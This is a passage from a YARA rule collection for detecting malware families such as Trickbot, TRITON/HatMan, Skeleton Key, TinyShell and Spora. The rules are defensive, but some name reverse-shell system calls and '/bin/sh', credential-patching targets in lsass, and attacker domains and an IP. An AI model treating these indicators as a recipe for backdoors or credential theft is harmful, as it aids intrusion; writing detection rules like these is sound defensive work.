    hash1 = "0066d1c8053ff8b0c07418c7f8d20e5cd64007bb850944269f611febd0c1afe0"
    hash2 = "3956d32a870d81be34cafc867769b2a2f55a96360070f1cb3d9addc2918357d5"
    hash3 = "3fde1b2b50fcb36a695f1e6bc577cd930c2343066d98982cf982393e55bfce0d"
    hash4 = "457ad4a4d4e675fe09f63873ca3364434dc872dde7d9b64ce7db919eaff47485"
    hash5 = "51edba913e8b83d1388b1be975957e439015289d51d3d5774d501551f220df6f"
    hash6 = "6611a2b79a3acf0003b1197aa5bfe488a33db69b663c79c6c5b023e86818d38b"
    hash7 = "72e239924faebf8209f8e3d093f264f778a55efb56b619f26cea73b1c4feb7a4"
    hash8 = "7a29cb641b9ac33d1bb405d364bc6e9c7ce3e218a8ff295b75ca0922cf418290"
    hash9 = "92fe4f9a87c796e993820d1bda8040aced36e316de67c9c0c5fc71aadc41e0f8"
    hash10 = "93ecb6bd7c76e1b66f8c176418e73e274e2c705986d4ac9ede9d25db4091ab05"
    hash11 = "a0b7fac69a4eb32953c16597da753b15060f6eba452d150109ff8aabc2c56123"
    hash12 = "a8b6e798116ce0b268e2c9afac61536b8722e86b958bd2ee95c6ecdec86130c9"
    hash13 = "d6244c1177b679b3d67f6cec34fe0ae87fba21998d4f5024d8eeaf15ca242503"
    hash14 = "dcc9c38e695ffd121e793c91ca611a4025a116321443297f710a47ce06afb36d"
  strings:
    $x1 = "\\Gather\\Dividerail.pdb" ascii
    $s0 = "\\payload\\payload.x86.pdb" ascii
    $s1 = "USER_PRIV_GUEST" wide fullword
    $s2 = "USER_PRIV_ADMIN" wide fullword
    $s3 = "USER_PRIV_USER" wide fullword
    $s4 = "PPSWVPP" ascii fullword
    $s5 = "WinSCard.dll" ascii fullword
  condition:
    uint16(0) == 23117 and ($x1 or 5 of ($s*))
}

rule Shifu : banking {
  meta:
    reference = "https://blogs.mcafee.com/mcafee-labs/japanese-banking-trojan-shifu-combines-malware-tools/"
    author = "McAfee Labs"
  strings:
    $b = "RegCreateKeyA"
    $a = "CryptCreateHash"
    $c = { 2F 00 63 00 20 00 73 00 74 00 61 00 72 00 74 00 20 00 22 00 22 00 20 00 22 00 25 00 73 00 22 00 20 00 25 00 73 00 00 00 00 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 00 00 00 72 00 75 00 6E }
    $d = { 53 00 6E 00 64 00 56 00 6F 00 6C 00 2E 00 65 00 78 00 65 }
    $e = { 52 00 65 00 64 00 69 00 72 00 65 00 63 00 74 00 45 00 58 00 45 }
  condition:
    all of them
}

rule skeleton_key_patcher {
  meta:
    description = "Skeleton Key Patcher from Dell SecureWorks Report http://goo.gl/aAk3lN"
    author = "Dell SecureWorks Counter Threat Unit"
    reference = "http://goo.gl/aAk3lN"
    date = "2015/01/13"
    score = 70
  strings:
    $target_process = "lsass.exe" wide
    $dll1 = "cryptdll.dll"
    $dll2 = "samsrv.dll"
    $name = "HookDC.dll"
    $patched1 = "CDLocateCSystem"
    $patched2 = "SamIRetrievePrimaryCredentials"
    $patched3 = "SamIRetrieveMultiplePrimaryCredentials"
  condition:
    all of them
}

rule skeleton_key_injected_code {
  meta:
    description = "Skeleton Key injected Code http://goo.gl/aAk3lN"
    author = "Dell SecureWorks Counter Threat Unit"
    reference = "http://goo.gl/aAk3lN"
    date = "2015/01/13"
    score = 70
  strings:
    $injected = { 33 C0 85 C9 0F 95 C0 48 8B 8C 24 40 01 00 00 48 33 CC E8 4D 02 00 00 48 81 C4 58 01 00 00 C3 }
    $patch_CDLocateCSystem = { 48 89 5C 24 08 48 89 74 24 10 57 48 83 EC 20 48 8B FA 8B F1 E8 ?? ?? ?? ?? 48 8B D7 8B CE 48 8B D8 FF 50 10 44 8B D8 85 C0 0F 88 A5 00 00 00 48 85 FF 0F 84 9C 00 00 00 83 FE 17 0F 85 93 00 00 00 48 8B 07 48 85 C0 0F 84 84 00 00 00 48 83 BB 48 01 00 00 00 75 73 48 89 83 48 01 00 00 33 D2 }
    $patch_SamIRetrievePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 49 8B F9 49 8B F0 48 8B DA 48 8B E9 48 85 D2 74 2A 48 8B 42 08 48 85 C0 74 21 66 83 3A 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 14 E8 ?? ?? ?? ?? 4C 8B CF 4C 8B C6 48 8B D3 48 8B CD FF 50 18 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
    $patch_SamIRetrieveMultiplePrimaryCredential = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 41 8B F9 49 8B D8 8B F2 8B E9 4D 85 C0 74 2B 49 8B 40 08 48 85 C0 74 22 66 41 83 38 26 75 1B 66 83 38 4B 75 15 66 83 78 0E 73 75 0E 66 83 78 1E 4B 75 07 B8 A1 02 00 C0 EB 12 E8 ?? ?? ?? ?? 44 8B CF 4C 8B C3 8B D6 8B CD FF 50 20 48 8B 5C 24 30 48 8B 6C 24 38 48 8B 74 24 40 48 83 C4 20 5F C3 }
  condition:
    any of them
}

rule Spora {
  meta:
    author = "pekeinfo"
    date = "2017-02-22"
    description = "Spora"
  strings:
    $a = { 7B 7F 4E 11 5D F3 FE 15 F9 55 FD 00 AD E9 CF FE E2 56 78 03 D0 21 46 00 30 68 C4 D0 01 FD 00 C3 B7 00 4A 0D 57 D2 52 91 05 }
    $b = { 6F 51 3E 6B F9 15 29 D9 DF 26 1E 80 62 8A 0D E3 64 51 3B 0F F3 FE FF FF F3 FE FF FF F3 FE FF FF F3 FE FF FF }
  condition:
    $a and $b
}

rule unk_packer {
  meta:
    author = "pekeinfo"
    date = "2017-02-22"
    description = "Spora & Cerber ek"
  strings:
    $a = { 0E 9E 52 69 C8 E4 73 BF 87 2B 95 15 33 1B B7 6B 46 62 D8 C1 01 A9 F9 17 FC EF 1A 6E B7 36 3C C4 72 7D 5D 1A 2D C4 7E 70 E8 0A A0 C6 A3 51 C1 1C 5E 98 E2 72 19 DF 03 C9 D4 25 25 1F EF 6B 46 75 9C BB 1D D2 57 56 35 75 31 35 56 8F B7 5B 23 3D }
    $b = { 00 10 00 2E E8 77 EC FF FF 85 C0 0F 85 78 C4 FF }
  condition:
    $a and $b
}

rule universal_1337_stealer_serveur : Stealer {
  meta:
    author = "Kevin Falcoz"
    date = "24/02/2013"
    description = "Universal 1337 Stealer Serveur"
  strings:
    $signature1 = { 2A 5B 53 2D 50 2D 4C 2D 49 2D 54 5D 2A }
    $signature2 = { 2A 5B 48 2D 45 2D 52 2D 45 5D 2A }
    $signature3 = { 46 54 50 7E }
    $signature4 = { 7E 31 7E 31 7E 30 7E 30 }
  condition:
    $signature1 and $signature2 or $signature3 and $signature4
}

private rule RSharedStrings : Surtr Family {
  meta:
    description = "identifiers for remote and gmremote"
    author = "Katie Kleemola"
    last_updated = "07-21-2014"
  strings:
    $ = "nView_DiskLoydb" wide
    $ = "nView_KeyLoydb" wide
    $ = "nView_skins" wide
    $ = "UsbLoydb" wide
    $ = "%sBurn%s" wide
    $ = "soul" wide
  condition:
    any of them
}

private rule RemoteStrings : Remote Variant Surtr Family {
  meta:
    description = "indicators for remote.dll - surtr stage 2"
    author = "Katie Kleemola"
    last_updated = "07-21-2014"
  strings:
    $ = "\x00Remote.dll\x00"
    $ = "\x00CGm_PlugBase::"
    $ = "\x00ServiceMain\x00_K_H_K_UH\x00"
    $ = "\x00_Remote_\x00" wide
  condition:
    any of them
}

private rule GmRemoteStrings : GmRemote Variant Family Surtr {
  meta:
    description = "identifiers for gmremote: surtr stage 2"
    author = "Katie Kleemola"
    last_updated = "07-21-2014"
  strings:
    $ = "\x00x86_GmRemote.dll\x00"
    $ = "\x00D:\\Project\\GTProject\\Public\\List\\ListManager.cpp\x00"
    $ = "\x00GmShutPoint\x00"
    $ = "\x00GmRecvPoint\x00"
    $ = "\x00GmInitPoint\x00"
    $ = "\x00GmVerPoint\x00"
    $ = "\x00GmNumPoint\x00"
    $ = "_Gt_Remote_" wide
    $ = "%sBurn\\workdll.tmp" wide
  condition:
    any of them
}

rule GmRemote : Family Surtr Variant GmRemote {
  meta:
    description = "identifier for gmremote"
    author = "Katie Kleemola"
    last_updated = "07-25-2014"
  condition:
    RSharedStrings and GmRemoteStrings
}

rule Remote : Family Surtr Variant Remote {
  meta:
    description = "identifier for remote"
    author = "Katie Kleemola"
    last_updated = "07-25-2014"
  condition:
    RSharedStrings and RemoteStrings
}

rule SurtrStrings : Surtr Family {
  meta:
    author = "Katie Kleemola"
    description = "Strings for Surtr"
    last_updated = "2014-07-16"
  strings:
    $ = "\x00soul\x00"
    $ = "\x00InstallDll.dll\x00"
    $ = "\x00_One.dll\x00"
    $ = "_Fra.dll"
    $ = "CrtRunTime.log"
    $ = "Prod.t"
    $ = "Proe.t"
    $ = "Burn\\"
    $ = "LiveUpdata_Mem\\"
  condition:
    any of them
}

rule SurtrCode : Surtr Family {
  meta:
    author = "Katie Kleemola"
    description = "Code features for Surtr Stage1"
    last_updated = "2014-07-16"
  strings:
    $ = { 8A ?? ?? 84 ?? ?? 74 ?? 3C 01 74 ?? 34 01 88 41 3B ?? 72 ?? }
    $ = { C6 [3] 42 C6 [3] 75 C6 [3] 72 C6 [3] 6E C6 [3] 5C }
    $ = { C6 [3] 5F C6 [3] 46 C6 [3] 69 C6 [3] 72 C6 [3] 65 C6 [3] 2E C6 [3] 64 }
  condition:
    any of them
}

rule Surtr : Family {
  meta:
    author = "Katie Kleemola"
    description = "Rule for Surtr Stage One"
    last_updated = "2014-07-16"
  condition:
    SurtrStrings or SurtrCode
}

rule T5000Strings : T5000 Family {
  meta:
    description = "T5000 Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-26"
  strings:
    $ = "_tmpR.vbs"
    $ = "_tmpg.vbs"
    $ = "Dtl.dat" ascii wide
    $ = "3C6FB3CA-69B1-454f-8B2F-BD157762810E"
    $ = "EED5CA6C-9958-4611-B7A7-1238F2E1B17E"
    $ = "8A8FF8AD-D1DE-4cef-B87C-82627677662E"
    $ = "43EE34A9-9063-4d2c-AACD-F5C62B849089"
    $ = "A8859547-C62D-4e8b-A82D-BE1479C684C9"
    $ = "A59CF429-D0DD-4207-88A1-04090680F714"
    $ = "utd_CE31" ascii wide
    $ = "f:\\Project\\T5000\\Src\\Target\\1 KjetDll.pdb"
    $ = "l:\\MyProject\\Vc 7.1\\T5000\\T5000Ver1.28\\Target\\4 CaptureDLL.pdb"
    $ = "f:\\Project\\T5000\\Src\\Target\\4 CaptureDLL.pdb"
    $ = "E:\\VS2010\\xPlat2\\Release\\InstRes32.pdb"
  condition:
    any of them
}

rule T5000 : Family {
  meta:
    description = "T5000"
    author = "Seth Hardy"
    last_modified = "2014-06-26"
  condition:
    T5000Strings
}

private rule hatman_setstatus : hatman {
  strings:
    $preset = { 80 00 40 3C 00 00 62 80 40 00 80 3C 40 20 03 7C ?? ?? 82 40 04 00 62 80 60 00 80 3C 40 20 03 7C ?? ?? 82 40 ?? ?? 42 38 }
  condition:
    $preset
}

private rule hatman_memcpy : hatman {
  strings:
    $memcpy_be = { 7C A9 03 A6 38 84 FF FF 38 63 FF FF 8C A4 00 01 9C A3 00 01 42 00 FF F8 4E 80 00 20 }
    $memcpy_le = { A6 03 A9 7C FF FF 84 38 FF FF 63 38 01 00 A4 8C 01 00 A3 9C F8 FF 00 42 20 00 80 4E }
  condition:
    $memcpy_be or $memcpy_le
}

private rule hatman_dividers : hatman {
  strings:
    $div1 = { 9A 78 56 00 }
    $div2 = { 34 12 00 00 }
  condition:
    $div1 and $div2
}

private rule hatman_nullsub : hatman {
  strings:
    $nullsub = { FF FF 60 38 02 00 00 44 20 00 80 4E }
  condition:
    $nullsub
}

private rule hatman_origaddr : hatman {
  strings:
    $oaddr_be = { 3C 60 00 03 60 63 96 F4 4E 80 00 20 }
    $oaddr_le = { 03 00 60 3C F4 96 63 60 20 00 80 4E }
  condition:
    $oaddr_be or $oaddr_le
}

private rule hatman_origcode : hatman {
  strings:
    $ocode_be = { 3C 00 00 03 60 00 A0 B0 7C 09 03 A6 4E 80 04 20 }
    $ocode_le = { 03 00 00 3C B0 A0 00 60 A6 03 09 7C 20 04 80 4E }
  condition:
    $ocode_be or $ocode_le
}

private rule hatman_mftmsr : hatman {
  strings:
    $mfmsr_be = { 7C 63 00 A6 }
    $mfmsr_le = { A6 00 63 7C }
    $mtmsr_be = { 7C 63 01 24 }
    $mtmsr_le = { 24 01 63 7C }
  condition:
    ($mfmsr_be and $mtmsr_be) or ($mfmsr_le and $mtmsr_le)
}

private rule hatman_loadoff : hatman {
  strings:
    $loadoff_be = { 80 60 00 04 48 00 ?? ?? 70 60 FF FF 28 00 00 00 40 82 ?? ?? 28 03 00 00 41 82 ?? ?? }
    $loadoff_le = { 04 00 60 80 ?? ?? 00 48 FF FF 60 70 00 00 00 28 ?? ?? 82 40 00 00 03 28 ?? ?? 82 41 }
  condition:
    $loadoff_be or $loadoff_le
}

private rule hatman_injector_int : hatman {
  condition:
    hatman_memcpy and hatman_origaddr and hatman_loadoff
}

private rule hatman_payload_int : hatman {
  condition:
    hatman_memcpy and hatman_origcode and hatman_mftmsr
}

rule hatman_compiled_python : hatman {
  condition:
    filesize < 102400 and hatman_nullsub and hatman_setstatus and hatman_dividers
}

rule hatman_injector : hatman {
  condition:
    filesize < 102400 and hatman_injector_int and not hatman_payload_int
}

rule hatman_payload : hatman {
  condition:
    filesize < 102400 and hatman_payload_int and not hatman_injector_int
}

rule hatman_combined : hatman {
  condition:
    filesize < 102400 and hatman_injector_int and hatman_payload_int and hatman_dividers
}

rule hatman : hatman {
  meta:
    author = "DHS/NCCIC/ICS-CERT"
    description = "Matches the known samples of the HatMan malware."
  condition:
    filesize < 102400 and hatman_compiled_python or hatman_injector or hatman_payload or hatman_combined
}

rule TRITON_ICS_FRAMEWORK {
  meta:
    author = "nicholas.carr @itsreallynick"
    md5 = "0face841f7b2953e7c29c064d6886523"
    description = "TRITON framework recovered during Mandiant ICS incident response"
  strings:
    $python_compiled = ".pyc" ascii wide nocase
    $python_module_01 = "__module__" ascii wide nocase
    $python_module_02 = "<module>" ascii wide nocase
    $python_script_01 = "import Ts" ascii wide nocase
    $python_script_02 = "def ts_" ascii wide nocase
    $py_cnames_01 = "TS_cnames.py" ascii wide nocase
    $py_cnames_02 = "TRICON" ascii wide nocase
    $py_cnames_03 = "TriStation " ascii wide nocase
    $py_cnames_04 = " chassis " ascii wide nocase
    $py_tslibs_01 = "GetCpStatus" ascii wide nocase
    $py_tslibs_02 = "ts_" ascii wide
    $py_tslibs_03 = " sequence" ascii wide nocase
    $py_tslibs_04 = /import Ts(Hi|Low|Base)[^:alpha:]/ ascii wide nocase
    $py_tslibs_05 = /module\s?version/ ascii wide nocase
    $py_tslibs_06 = "bad " ascii wide nocase
    $py_tslibs_07 = "prog_cnt" ascii wide nocase
    $py_tsbase_01 = "TsBase.py" ascii wide nocase
    $py_tsbase_02 = ".TsBase(" ascii wide nocase
    $py_tshi_01 = "TsHi.py" ascii wide nocase
    $py_tshi_02 = "keystate" ascii wide nocase
    $py_tshi_03 = "GetProjectInfo" ascii wide nocase
    $py_tshi_04 = "GetProgramTable" ascii wide nocase
    $py_tshi_05 = "SafeAppendProgramMod" ascii wide nocase
    $py_tshi_06 = ".TsHi(" ascii wide nocase
    $py_tslow_01 = "TsLow.py" ascii wide nocase
    $py_tslow_02 = "print_last_error" ascii wide nocase
    $py_tslow_03 = ".TsLow(" ascii wide nocase
    $py_tslow_04 = "tcm_" ascii wide
    $py_tslow_05 = " TCM found" ascii wide nocase
    $py_crc_01 = "crc.pyc" ascii wide nocase
    $py_crc_02 = "CRC16_MODBUS" ascii wide
    $py_crc_03 = "Kotov Alaxander" ascii wide nocase
    $py_crc_04 = "CRC_CCITT_XMODEM" ascii wide
    $py_crc_05 = "crc16ret" ascii wide
    $py_crc_06 = "CRC16_CCITT_x1D0F" ascii wide
    $py_crc_07 = /CRC16_CCITT[^_]/ ascii wide
    $py_sh_01 = "sh.pyc" ascii wide nocase
    $py_keyword_01 = " FAILURE" ascii wide
    $py_keyword_02 = "symbol table" ascii wide nocase
    $py_TRIDENT_01 = "inject.bin" ascii wide nocase
    $py_TRIDENT_02 = "imain.bin" ascii wide nocase
  condition:
    2 of ($python_*) and 7 of ($py_*) and filesize < 3145728
}

rule Tedroo : Spammer {
  meta:
    author = "Kevin Falcoz"
    date = "22/11/2015"
    description = "Tedroo Spammer"
  strings:
    $signature1 = { 25 73 25 73 2E 65 78 65 }
    $signature2 = { 5F 6C 6F 67 2E 74 78 74 }
  condition:
    $signature1 and $signature2
}

rule Tinba2 : banking {
  meta:
    author = "n3sfox <n3sfox@gmail.com>"
    date = "2015/11/07"
    description = "Tinba 2 (DGA) banking trojan"
    reference = "https://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world"
    filetype = "memory"
    hash1 = "c7f662594f07776ab047b322150f6ed0"
    hash2 = "dc71ef1e55f1ddb36b3c41b1b95ae586"
    hash3 = "b788155cb82a7600f2ed1965cffc1e88"
  strings:
    $str1 = "MapViewOfFile"
    $str2 = "OpenFileMapping"
    $str3 = "NtCreateUserProcess"
    $str4 = "NtQueryDirectoryFile"
    $str5 = "RtlCreateUserThread"
    $str6 = "DeleteUrlCacheEntry"
    $str7 = "PR_Read"
    $str8 = "PR_Write"
    $pubkey = "BEGIN PUBLIC KEY"
    $code1 = { 50 87 44 24 04 6A ?? E8 }
  condition:
    all of ($str*) and $pubkey and $code1
}

private rule is__osx {
  meta:
    date = "2018-02-12"
    author = "@unixfreaxjp"
  condition:
    uint32(0) == 4277009102 or uint32(0) == 3405691582 or uint32(0) == 3199925962 or uint32(0) == 3472551422 or uint32(0) == 4277009103 or uint32(0) == 3489328638
}

private rule priv01 {
  meta:
    date = "2018-02-11"
    author = "@unixfreaxjp"
  strings:
    $vara01 = { 73 3A 70 3A 00 }
    $vara02 = "Usage: %s" ascii wide nocase fullword
    $vara03 = "[ -s secret ]" ascii wide nocase fullword
    $vara04 = "[ -p port ]" ascii wide nocase fullword
  condition:
    all of them
}

private rule priv03 {
  meta:
    date = "2018-02-10"
    author = "@unixfreaxjp"
  strings:
    $varb01 = { 41 57 41 56 41 55 41 54 55 53 0F B6 06 }
    $varb02 = { 48 C7 07 00 00 00 00 48 C7 47 08 00 00 }
    $vard01 = { 55 48 89 E5 41 57 41 56 41 55 41 54 53 }
    $vard02 = { 55 48 89 E5 48 C7 47 08 00 00 00 00 48 }
  condition:
    (2 of ($varb*)) or (2 of ($vard*))
}

private rule priv04 {
  meta:
    date = "2018-02-11"
    author = "@unixfreaxjp"
  strings:
    $varb03 = { 89 DF E8 FB A4 FF FF 83 C3 01 81 FB 00 04 }
    $vard03 = { 66 89 05 7D 5E 00 00 }
  condition:
    1 of them
}

private rule priv02 {
  meta:
    date = "2018-02-10"
    author = "@unixfreaxjp"
  strings:
    $vare01 = "socket" ascii wide nocase fullword
    $vare02 = "connect" ascii wide nocase fullword
    $vare03 = "alarm" ascii wide nocase fullword
    $vare04 = "dup2" ascii wide nocase fullword
    $vare05 = "execl" ascii wide nocase fullword
    $vare06 = "openpty" ascii wide nocase fullword
    $vare07 = "putenv" ascii wide nocase fullword
    $vare08 = "setsid" ascii wide nocase fullword
    $vare09 = "ttyname" ascii wide nocase fullword
    $vare00 = "waitpid" ascii wide nocase fullword
    $varc01 = "HISTFIL" ascii wide nocase fullword
    $varc02 = "TERML" ascii wide nocase fullword
    $varc03 = "/bin/sh" ascii wide nocase fullword
  condition:
    (5 of ($vare*) or (2 of ($varc*)))
}

rule MALW_TinyShell_backconnect_OSX {
  meta:
    date = "2018-02-10"
    author = "@unixfreaxjp"
  condition:
    is__osx and priv01 and priv02 and priv03 and priv04 and filesize < 102400
}

rule MALW_TinyShell_backconnect_ELF {
  meta:
    date = "2018-02-10"
    author = "@unixfreaxjp"
  condition:
    is__elf and priv01 and ((priv02) or ((priv03) or (priv04))) and filesize < 102400
}

rule MALW_TinyShell_backconnect_Gen {
  meta:
    date = "2018-02-11"
    author = "@unixfreaxjp"
  condition:
    ((is__elf) or (is__osx)) and priv01 and priv02 and filesize < 102400
}

rule MALW_TinyShell_backdoor_Gen {
  meta:
    date = "2018-02-11"
    author = "@unixfreaxjp"
  condition:
    ((is__elf) or (is__osx)) and priv01 and filesize > 20480
}

rule ELF_Linux_Torte : Linux ELF {
  meta:
    author = "@mmorenog,@yararules"
    description = "Detects ELF Linux/Torte infection"
    ref = "http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html"
    hash1 = "1faf27f6b8e8a9cadb611f668a01cf73"
    hash2 = "cb0477445fef9c5f1a5b6689bbfb941e"
  strings:
    $s0 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6)"
    $s1 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.7.6)"
    $s2 = "?sessd="
    $s3 = "&sessc="
    $s4 = "&sessk="
    $s5 = "3a08fe7b8c4da6ed09f21c3ef97efce2"
    $s6 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
    $s7 = "_ZN11CThreadPool10getBatchesERSt6vectorISt4pairISsiESaIS2_EE"
    $s8 = "_ZNSs4_Rep10_M_destroyERKSaIcE@@GLIBCXX_3.4"
    $s9 = "_ZNSt6vectorImSaImEE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPmS1_EERKm"
    $s10 = "_ZNSt6vectorISt4pairISsiESaIS1_EE13_M_insert_auxEN9__gnu_cxx17__normal_iteratorIPS1_S3_EERKS1_"
    $s11 = "_ZSt20__throw_out_of_rangePKc@@GLIBCXX_3.4"
  condition:
    is__elf and all of ($s*)
}

rule ELF_Linux_Torte_domains {
  meta:
    author = "@mmorenog,@yararules"
    description = "Detects ELF Linux/Torte infection"
    ref1 = "http://blog.malwaremustdie.org/2016/01/mmd-0050-2016-incident-report-elf.html"
  strings:
    $1 = "pages.touchpadz.com" ascii wide nocase
    $2 = "bat.touchpadz.com" ascii wide nocase
    $3 = "stat.touchpadz.com" ascii wide nocase
    $4 = "sk2.touchpadz.com" ascii wide nocase
  condition:
    any of them
}

rule TreasureHunt {
  meta:
    author = "Minerva Labs"
    ref = "http://www.minerva-labs.com/#!Cybercriminals-Adopt-the-Mossad-Emblem/c7a5/573da2d60cf2f90ca6f6e3ed"
    date = "2016/06"
    maltype = "Point of Sale (POS) Malware"
    filetype = "exe"
  strings:
    $a = "treasureHunter.pdb"
    $b = "jucheck"
    $c = "cmdLineDecrypted"
  condition:
    all of them
}

rule MALW_trickbot_bankBot : Trojan {
  meta:
    author = "Marc Salinas @Bondey_m"
    description = "Detects Trickbot Banking Trojan"
  strings:
    $str_trick_01 = "moduleconfig"
    $str_trick_02 = "Start"
    $str_trick_03 = "Control"
    $str_trick_04 = "FreeBuffer"
    $str_trick_05 = "Release"
  condition:
    all of ($str_trick_*)
}

rule MALW_systeminfo_trickbot_module : Trojan {
  meta:
    author = "Marc Salinas @Bondey_m"
    description = "Detects systeminfo module from Trickbot Trojan"
  strings:
    $str_systeminf_01 = "<program>"
    $str_systeminf_02 = "<service>"
    $str_systeminf_03 = "</systeminfo>"
    $str_systeminf_04 = "GetSystemInfo.pdb"
    $str_systeminf_05 = "</autostart>"
    $str_systeminf_06 = "</moduleconfig>"
  condition:
    all of ($str_systeminf_*)
}

rule MALW_dllinject_trickbot_module : Trojan {
  meta:
    author = "Marc Salinas @Bondey_m"
    description = " Detects dllinject module from Trickbot Trojan"
  strings:
    $str_dllinj_01 = "user_pref("
    $str_dllinj_02 = "<ignore_mask>"
    $str_dllinj_03 = "<require_header>"
    $str_dllinj_04 = "</dinj>"
  condition:
    all of ($str_dllinj_*)
}

rule MALW_mailsercher_trickbot_module : Trojan {
  meta:
    author = "Marc Salinas @Bondey_m"
    description = " Detects mailsearcher module from Trickbot Trojan"
  strings:
    $str_mails_01 = "mailsearcher"
    $str_mails_02 = "handler"
    $str_mails_03 = "conf"
    $str_mails_04 = "ctl"
    $str_mails_05 = "SetConf"
    $str_mails_06 = "file"
    $str_mails_07 = "needinfo"
    $str_mails_08 = "mailconf"
  condition:
    all of ($str_mails_*)
}

rule TrumpBot : MALW {
  meta:
    description = "TrumpBot"
    author = "Joan Soriano / @joanbtl"
    date = "2017-04-16"
    version = "1.0"
    MD5 = "77122e0e6fcf18df9572d80c4eedd88d"
    SHA1 = "108ee460d4c11ea373b7bba92086dd8023c0654f"
  strings:
    $string = "trumpisdaddy"
    $ip = "198.50.154.188"
  condition:
    all of them
}

rule Upatre_Hazgurut {
  meta:
    description = "Detects Upatre malware - file hazgurut.exe"
    author = "Florian Roth"
    reference = "https://weankor.vxstream-sandbox.com/sample/6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3?environmentId=7"
    date = "2015-10-13"
    score = 70
    hash1 = "7ee0d20b15e24b7fe72154d9521e1959752b4e9c20d2992500df9ac096450a50"
    hash2 = "79ffc620ddb143525fa32bc6a83c636168501a4a589a38cdb0a74afac1ee8b92"
    hash3 = "62d8a6880c594fe9529158b94a9336179fa7a3d3bf1aa9d0baaf07d03b281bd3"
    hash4 = "c64282aca980d558821bec8b3dfeae562d9620139dc43d02ee4d1745cd989f2a"
    hash5 = "a35f9870f9d4b993eb094460b05ee1f657199412807abe6264121dd7cc12aa70"
    hash6 = "f8cb2730ebc8fac1c58da1346ad1208585fe730c4f03d976eb1e13a1f5d81ef9"
    hash7 = "b65ad7e2d299d6955d95b7ae9b62233c34bc5f6aa9f87dc482914f8ad2cba5d2"
    hash8 = "6b857ef314938d37997c178ea50687a281d8ff9925f0c4e70940754643e2c0e3"
    hash9 = "33a288cef0ae7192b34bd2ef3f523dfb7c6cbc2735ba07edf988400df1713041"
    hash10 = "2a8e50afbc376cb2a9700d2d83c1be0c21ef942309676ecac897ba4646aba273"
    hash11 = "3d0f2c7e07b7d64b1bad049b804ff1aae8c1fc945a42ad555eca3e1698c7f7d3"
    hash12 = "951360b32a78173a1f81da0ded8b4400e230125d05970d41621830efc5337274"
    hash13 = "bd90faebfd7663ef89b120fe69809532cada3eb94bb94094e8bc615f70670295"
    hash14 = "8c5823f67f9625e4be39a67958f0f614ece49c18596eacc5620524bc9b6bad3d"
  strings:
    $a1 = "barcod" ascii fullword
    $s0 = "msports.dll" ascii fullword
    $s1 = "nddeapi.dll" ascii fullword
    $s2 = "glmf32.dll" ascii fullword
    $s3 = "<requestedExecutionLevel level=\"requireAdministrator\" uiAccess=\"false\">" ascii fullword
    $s4 = "cmutil.dll" ascii fullword
    $s5 = "mprapi.dll" ascii fullword
    $s6 = "glmf32.dll" ascii fullword
  condition:
    uint16(0) == 23117 and filesize < 1536000 and $a1 in (0..4000) and all of ($s*)
}

rule urausy_skype_dat : memory {
  meta:
    author = "AlienVault Labs"
    description = "Yara rule to match against memory of processes infected by Urausy skype.dat"
  strings:
    $a = "skype.dat" ascii wide
    $b = "skype.ini" ascii wide
    $win1 = "CreateWindow"
    $win2 = "YIWEFHIWQ" ascii wide
    $desk1 = "CreateDesktop"
    $desk2 = "MyDesktop" ascii wide
  condition:
    $a and $b and (all of ($win*) or all of ($desk*))
}

rule VidgrabCode : Vidgrab Family {
  meta:
    description = "Vidgrab code tricks"
    author = "Seth Hardy"
    last_modified = "2014-06-20"
  strings:
    $divbyzero = { B8 02 00 00 00 48 48 BA 02 00 00 00 83 F2 02 F7 F0 }
    $xorloop = { 03 C1 80 30 ( 66 | 58 ) 41 }
    $junk = { 8B 4? ?? 8B 4? ?? 03 45 08 52 5A }
  condition:
    all of them
}

rule VidgrabStrings : Vidgrab Family {
  meta:
    description = "Vidgrab Identifying Strings"
    author = "Seth Hardy"
    last_modified = "2014-06-20"
  strings:
    $ = "IDI_ICON5" ascii wide
    $ = "starter.exe"
    $ = "wmifw.exe"
    $ = "Software\\rar"
    $ = "tmp092.tmp"
    $ = "temp1.exe"
  condition:
    3 of them
}

rule Vidgrab : Family {
  meta:
    description = "Vidgrab"
    author = "Seth Hardy"
    last_modified = "2014-06-20"
  condition:
    VidgrabCode or VidgrabStrings
}

rule VirutFileInfector {
  meta:
    author = "D00RT <@D00RT_RM>"
    data = "2017/08/04"
    description = "Virut (unknown version) fileinfector detection"
    reference = "http://reversingminds-blog.logdown.com"
    infected_sample1 = "5755f09d445a5dcab3ea92d978c7c360"
    infected_sample2 = "68e508108ed94c8c391c70ef1d15e0f8"
    infected_sample2 = "2766e8e78ee10264cf1a3f5f4a16ff00"
  strings:
    $sign = { F9 E8 22 00 00 00 ?? 31 EB 56 }
    $func = { 52 C1 E9 1D 68 31 D4 00 00 58 5A 81 C1 94 01 00 00 80 4D 00 F0 89 6C 24 04 F7 D1 81 6C 24 04 }
  condition:
    $sign and $func
}

rule volgmer {
  meta:
    description = "Malformed User Agent"
    ref = "https://www.us-cert.gov/ncas/alerts/TA17-318B"
  strings:
    $s = "Mozillar/"
  condition:
    (uint16(0) == 23117 and uint16(uint32(60)) == 17744) and $s
}

rule Wabot : Worm {
  meta:
    author = "Kevin Falcoz"
    date = "14/08/2015"
    description = "Wabot Trojan Worm"
  strings:
    $signature1 = { 43 3A 5C 6D 61 72 69 6A 75 61 6E 61 2E 74 78 74 }
    $signature2 = { 73 49 52 43 34 }
  condition:
    $signature1 and $signature2
}

rule WarpCode : Warp Family {
  meta:
    description = "Warp code features"
    author = "Seth Hardy"
    last_modified = "2014-07-10"
  strings:
